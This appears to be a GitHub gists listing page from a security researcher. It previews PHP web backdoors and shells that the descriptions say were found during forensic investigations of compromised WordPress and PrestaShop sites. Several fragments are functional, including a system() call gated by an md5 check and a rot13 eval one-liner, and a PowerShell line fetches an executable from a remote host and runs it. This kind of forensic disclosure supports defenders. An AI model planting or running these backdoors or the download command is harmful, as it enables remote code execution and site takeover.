Jonas Lejon jonaslejon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am jonaslejon on github. | |
| * I am jonaslejon (https://keybase.io/jonaslejon) on keybase. | |
| * I have a public key ASD1npZDNt8vxdD8n7zAoGKJ3RbSpFrSI1NBTFOp8MQjFAo | |
| To claim this, I am signing this object: |
jonaslejon
/ Iicense.php
Last active
December 12, 2015 14:24
Magic Include Shell PHP Backdoor found at customer site
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| error_reporting(0); | |
| $ver = '6.6.6'; | |
| $my_keyw = $_SERVER['HTTP_USER_AGENT']; | |
| $items_per_page = 50; | |
| $admin_name = '27a0e2015f9087981c0b95a29fc4ba57'; | |
| $admin_pass = '9413c48772f73d5c305b65eb58a06f9c'; | |
| if($my_keyw=='spaumbot') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { | |
| $time = str_replace("@"," ",$_GET["localtime"]); | |
| @system($time); exit; | |
| } | |
| ?> |
jonaslejon
/ fs-login.php
Created
September 25, 2015 20:38
PHP Backdoor found on site. Maybe devilzShell by b374k
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $s_pass = "741721fcb0bfc1f04405d8c82e436cab5ffcb141"; ?><?php | |
| $s_ver = "2.8"; | |
| $s_title = "b374k " . $s_ver; | |
| $s_login_time = 3600 * 24 * 7; | |
| $s_debug = false; | |
| @ob_start(); | |
| @set_time_limit(0); | |
| @ini_set('html_errors', '0'); | |
| @clearstatcache(); |
jonaslejon
/ t44.php
Created
September 25, 2015 12:06
WordPress backdoor user. Found duing forensic investigation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| error_reporting(0); | |
| if(isset($_GET['check'])) | |
| { | |
| echo "pawet"; | |
| } | |
| if(isset($_REQUEST["v1"])) | |
| { | |
| $link = mysql_connect($_REQUEST["v1"], $_REQUEST["v2"], $_REQUEST["v3"]); | |
| $query = "SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema NOT IN ( 'information_schema', 'performance_schema', 'mysql' )"; |
jonaslejon
/ tracks.php
Last active
September 24, 2015 13:28
Obfuscated PHP backdoor found in client PrestaShop installation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(!defined("CUR_PATH")){ | |
| define("CUR_PATH",dirname(__FILE__) . DIRECTORY_SEPARATOR); | |
| } | |
| if(!defined("SETTINGS_FILE")){ | |
| define("SETTINGS_FILE",CUR_PATH."img.jpg"); | |
| } | |
| if(!defined("LOG_FILE")){ | |
| define("LOG_FILE",CUR_PATH."dot.jpg"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('https://x.x.x.x/file.exe','%TEMP%\\31231231.cab'); expand %TEMP%\31231231.cab %TEMP%\31231231.exe; start %TEMP%\31231231.exe; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| The code below was found during a forensic investigation. It seems to be a mass mailer that is using the PHPMailer class to send mail | |
| from compromised web hosting providers. | |
| The "password" is 5307c392-ad5e-4909-adec-c9fd12572686, see below. | |
| Investigation was made by Jonas Lejon <jonas.githubgist at- triop.se> | |
| The signature for PHP.Trojan.Mailer-1 can only find the packed version of this file. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| The PHP backdoor code below was found during an forensic investigation, a part of the payload is not posted here. | |
| */ | |
| $payload_name = ""; | |
| srand(time()); |
jonaslejon
/ wp-backdoor.php
Last active
February 23, 2016 16:04
One-liner WordPress PHP Backdoor with rot13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ($WordPress = $_POST['Wp']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($WordPress)', 'add'); |